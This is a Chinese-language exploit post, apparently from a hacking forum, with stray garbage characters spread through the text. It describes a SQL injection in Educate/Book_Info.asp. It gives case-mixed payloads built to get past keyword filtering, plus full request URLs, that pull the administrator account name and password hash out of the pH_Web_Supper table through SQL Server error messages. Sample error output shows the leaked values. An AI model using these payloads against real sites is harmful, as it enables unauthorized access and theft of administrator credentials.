漏洞出现在Educate/Book_Info.asp
4 y& u# [7 m0 P ) h, i, w2 a. t2 |4 s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
`- F/ P0 m: ^/ Q! B, B
2 L% Z( Q, k) m3 B! O0 P3 Mexp:如下
5 a! F/ @& v5 I ]9 t5 \% L6 i查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) z, F1 E& j" M( }2 a- x8 ]查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* K w" _3 {% r+ }
; F0 N9 g' j X1 F6 Lhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. A5 C4 T3 e: K/ Y) q
9 X0 K+ a/ H- f6 BMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
" @& i, ~7 I1 H9 D; ] 6 h$ \. P4 v9 x9 N& A
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。: V' Y% \# p+ G ^. l% G
/ y& Q3 k2 S' `- X. M1 {/Educate/Book_Info.asp,行 8, C/ n7 p& t7 M2 a U+ D
0 \- W& D o8 U+ @* D& v3 n ahttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 @# o9 x; h. J, F2 f/ H
9 I0 p- p7 t/ dMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
% m0 i. H, D' x" X / C) N3 B: o( E
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* A9 h" m0 ?' N, S! m
) w% T: p$ j+ z/Educate/Book_Info.asp,行 8
% a" a0 P3 T- @9 N) y# W" J |